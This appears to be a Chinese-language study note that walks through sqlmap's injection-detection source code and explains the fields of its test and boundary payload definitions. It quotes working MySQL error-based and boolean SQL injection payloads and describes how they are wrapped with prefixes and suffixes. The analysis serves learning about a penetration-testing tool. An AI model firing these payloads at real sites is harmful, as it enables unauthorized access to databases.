errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, "\n").split("\n"))
else:
errorSet = set()
if originalSet == trueSet != falseSet:
candidates = trueSet - falseSet - errorSet
if candidates:
candidates = sorted(candidates, key=lambda _: len(_))
for candidate in candidates:
if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
conf.string = candidate
injectable = True
infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
logger.info(infoMsg)
break
if injectable:
if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
if all((falseCode, trueCode)) and falseCode != trueCode:
conf.code = trueCode
infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --code=%d)" % (paramType, parameter, title, conf.code)
logger.info(infoMsg)
else:
trueSet = set(extractTextTagContent(trueRawResponse))
trueSet |= set(__ for _ in trueSet for __ in _.split())
falseSet = set(extractTextTagContent(falseRawResponse))
falseSet |= set(__ for _ in falseSet for __ in _.split())
if threadData.lastErrorPage and threadData.lastErrorPage[1]:
errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))
errorSet |= set(__ for _ in errorSet for __ in _.split())
else:
errorSet = set()
candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet)))
if candidates:
candidates = sorted(candidates, key=lambda _: len(_))
for candidate in candidates:
if re.match(r"\A\w+\Z", candidate):
break
conf.string = candidate
infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
logger.info(infoMsg)
if not any((conf.string, conf.notString)):
candidates = filter(None, (_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet)))
if candidates:
candidates = sorted(candidates, key=lambda _: len(_))
for candidate in candidates:
if re.match(r"\A\w+\Z", candidate):
break
conf.notString = candidate
infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --not-string=\"%s\")" % (paramType, parameter, title, repr(conf.notString).lstrip('u').strip("'"))
logger.info(infoMsg)
if not any((conf.string, conf.notString, conf.code)):
infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
singleTimeLogMessage(infoMsg)
# 报错注入
elif method == PAYLOAD.METHOD.GREP:
# {
# 'risk': 1,
# 'title': 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)',
# 'clause': [1, 2, 3, 8, 9],
# 'level': 4,
# 'request': {
# 'payload': "AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"
# },
# 'vector': "AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))",
# 'details': {
# 'dbms': 'MySQL',
# 'dbms_version': '>= 5.5'
# },
# 'where': [1],
# 'response': {
# 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]'
# },
# 'stype': 2
# }
# 对于 响应匹配 q(zqxjkvbp)q 中间随机三位
# 正则匹配 response 的 grep
try:
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output:
result = output == "1"
if result:
infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
except SqlmapConnectionException, msg:
debugMsg = "problem occurred most likely because the "
debugMsg += "server hasn't recovered as expected from the "
debugMsg += "error-based payload used ('%s')" % msg
logger.debug(debugMsg)
# 时间盲注
elif method == PAYLOAD.METHOD.TIME:
# Perform the test's request
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
trueCode = threadData.lastCode
if trueResult:
# Extra validation step (e.g. to check for DROP protection mechanisms)
if SLEEP_TIME_MARKER in reqPayload:
falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False)
if falseResult:
continue
# Confirm test's results
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
if trueResult:
infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
# 联合查询
elif method == PAYLOAD.METHOD.UNION:
# Test for UNION injection and set the sample
# payload as well as the vector.
# NOTE: vector is set to a tuple with 6 elements,
# used afterwards by Agent.forgeUnionQuery()
# method to forge the UNION query payload
configUnion(test.request.char, test.request.columns)
if len(kb.dbmsFilter or []) == 1:
Backend.forceDbms(kb.dbmsFilter[0])
elif not Backend.getIdentifiedDbms():
if kb.heuristicDbms is None:
if kb.heuristicTest == HEURISTIC_TEST.POSITIVE or injection.data:
warnMsg = "using unescaped version of the test "
warnMsg += "because of zero knowledge of the "
warnMsg += "back-end DBMS. You can try to "
warnMsg += "explicitly set it with option '--dbms'"
singleTimeWarnMessage(warnMsg)
else:
Backend.forceDbms(kb.heuristicDbms)
if unionExtended:
infoMsg = "automatically extending ranges for UNION "
infoMsg += "query injection technique tests as "
infoMsg += "there is at least one other (potential) "
infoMsg += "technique found"
singleTimeLogMessage(infoMsg)
# Test for UNION query SQL injection
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
if isinstance(reqPayload, basestring):
infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
# Overwrite 'where' because it can be set
# by unionTest() directly
where = vector[6]
kb.previousMethod = method
if conf.offline:
injectable = False
# If the injection test was successful feed the injection
# object with the test's details
if injectable is True:
# Feed with the boundaries details only the first time a
# test has been successful
if injection.place is None or injection.parameter is None:
if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
injection.parameter = place
else:
injection.parameter = parameter
injection.place = place
injection.ptype = ptype
injection.prefix = prefix
injection.suffix = suffix
injection.clause = clause
# 注入的语句有的是能确定数据库类型及其版本的 确定的话就存储数据
if hasattr(test, "details"):
for key, value in test.details.items():
if key == "dbms":
injection.dbms = value
if not isinstance(value, list):
Backend.setDbms(value)
else:
Backend.forceDbms(value[0], True)
elif key == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
injection.dbms_version = Backend.setVersion(value)
elif key == "os" and injection.os is None:
injection.os = Backend.setOs(value)
if vector is None and "vector" in test and test.vector is not None:
vector = test.vector
# 成功后将注入的数据都存储到 inject中
injection.data[stype] = AttribDict()
injection.data[stype].title = title
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)
# payload u'id=1") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786b6a71,(SELECT (ELT(9718=9718,1))),0x7162627671,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("qNpF"="qNpF'
injection.data[stype].where = where
injection.data[stype].vector = vector
# vector "AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"
injection.data[stype].comment = comment
injection.data[stype].templatePayload = templatePayload
injection.data[stype].matchRatio = kb.matchRatio
injection.data[stype].trueCode = trueCode
injection.data[stype].falseCode = falseCode
injection.conf.textOnly = conf.textOnly
injection.conf.titles = conf.titles
injection.conf.code = conf.code
injection.conf.string = conf.string
injection.conf.notString = conf.notString
injection.conf.regexp = conf.regexp
injection.conf.optimize = conf.optimize
if not kb.alerted:
if conf.beep:
beep()
if conf.alert:
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
logger.info(infoMsg)
process = subprocess.Popen(conf.alert.encode(sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True)
process.wait()
kb.alerted = True
# There is no need to perform this test for other
# <where> tags
break
if injectable is True:
kb.vulnHosts.add(conf.hostname)
break
# Reset forced back-end DBMS value
Backend.flushForcedDbms()
finally:
# Reset forced back-end DBMS value
Backend.flushForcedDbms()
Backend.flushForcedDbms(True)
# Return the injection object
if injection.place is not None and injection.parameter is not None:
if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'):
warnMsg = "in OR boolean-based injection cases, please consider usage "
warnMsg += "of switch '--drop-set-cookie' if you experience any "
warnMsg += "problems during data retrieval"
logger.warn(warnMsg)
if not checkFalsePositives(injection):
kb.vulnHosts.remove(conf.hostname)
if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)
else:
injection = None
if injection and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
checkSuhosinPatch(injection)
checkFilteredChars(injection)
return injection
test
title属性
title属性为当前测试Payload的标题,通过标题就可以了解当前的注入手法与测试的数据库类型。
stype属性
这一个属性标记着当前的注入手法类型,1为布尔类型盲注,2为报错注入。
1: Boolean-based blind SQL injection
2: Error-based queries SQL injection
3: Inline queries SQL injection
4: Stacked queries SQL injection
5: Time-based blind SQL injection
6: UNION query SQL injection
level属性
这个属性是每个test都有的,他是作用是是限定在SQL测试中处于哪个深度,简单的来说就是当你在使用SQLMAP进行SQL注入测试的时候,需要指定扫描的level,默认是1,最大为5,当level约高是,所执行的test越多,如果你是指定了level5进行注入测试,那麽估计执行的测试手法会将超过1000个。
1: Always (<100 requests)
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)
clause
payload在哪个位置生效
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)
where属性
添加完整payload 的地方, 这和boundary子节点where的含义是一致的
1:将字符串附加到 参数原始值
2:将参数原始值替换为负随机整数值,并附加字符串
3:用字符串替换 参数原始值
payload属性
这一属性既是将要进行测试的SQL语句,也是SQLMap扫描逻辑的关键,其中的[RANDNUM],[DELIMITER_START],[DELIMITER_STOP]分别代表着随机数值与字符。当SQLMap扫描时会把对应的随机数替换掉,然后再与boundary的前缀与后缀拼接起来,最终成为测试的Payload。
comment 是注释 在payload之后 后缀之前的语句
details属性
其子节点会一般有两个,其dbms子节所代表的是当前Payload所适用的数据库类型,当前例子中的值为MySQL,则表示其Payload适用的数据库为MySQL,其dbms_version子节所代表的适用的数据库版本。
response属性
这一属性下的子节点标记着当前测试的Payload测试手法
grep :报错注入
comparison :布尔盲注入
time :延时注入
union :联合查询注入
boundary
ptype
测试参数的类型
1:非转义数字
2:单引号字符串
3:像单引号字符串
4:双引号字符串
5:像双引号字符串
prefix
前缀
<payload> <comment>添加的前缀
suffix
后缀
<payload> <comment>添加的后缀
循环遍历每一个test,对某个test,循环遍历boundary;若boundary的where包含test的where值,并且boundary的clause包含test的clause值, 则boundary和test可以匹配;循环test的where值,结合匹配的boundary生成相应的payload。
第一个匹配上的 边界的前后缀:
prefix: ')'
suffix: 'AND ([RANDNUM]=[RANDNUM]'
先闭合前面的括号,如果有参数指定的前后缀则使用参数指定,然后对test的paylaod对应的增加前后缀。第一次发正确的u’1) AND 7862=7862 AND (9976=9976’
。然后进行编码,将请求的页面等数据存储到当前线程 threadData中存储。
trueResult = Request.queryPage(reqPayload, place, raise404=False)
truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
trueRawResponse = "%s%s" % (trueHeaders, truePage)
有闭合前后括号,最后面注释,他会对payload 把数字等去掉来进行去除,请求的时候会标识符进行替换,然后再发起请求。
1 and 1873=9402
1 and 9977=9977
最后是单引号闭合成功 因为页面不同了 因为是错误的
布尔盲注
尝试替换边界,检测两次提交后的内容,观察页面返回值是否有差异。如果检测到差异就找到回显点,然后尝试其他payload的注入。
1 and 1873=9402
1 and 9977=9977
报错注入
时间盲注
尝试5s-0s-5s的sleep来观察回显的稳定性。其中sleep时间的长度取决于conf中配置的时间。
联合注入
类似,尝试设置前缀后缀来进行闭合。
其他
剩下的下次再详细分析,毕设写不完了www。
https://www.processon.com/view/5835511ce4b0620292bd7285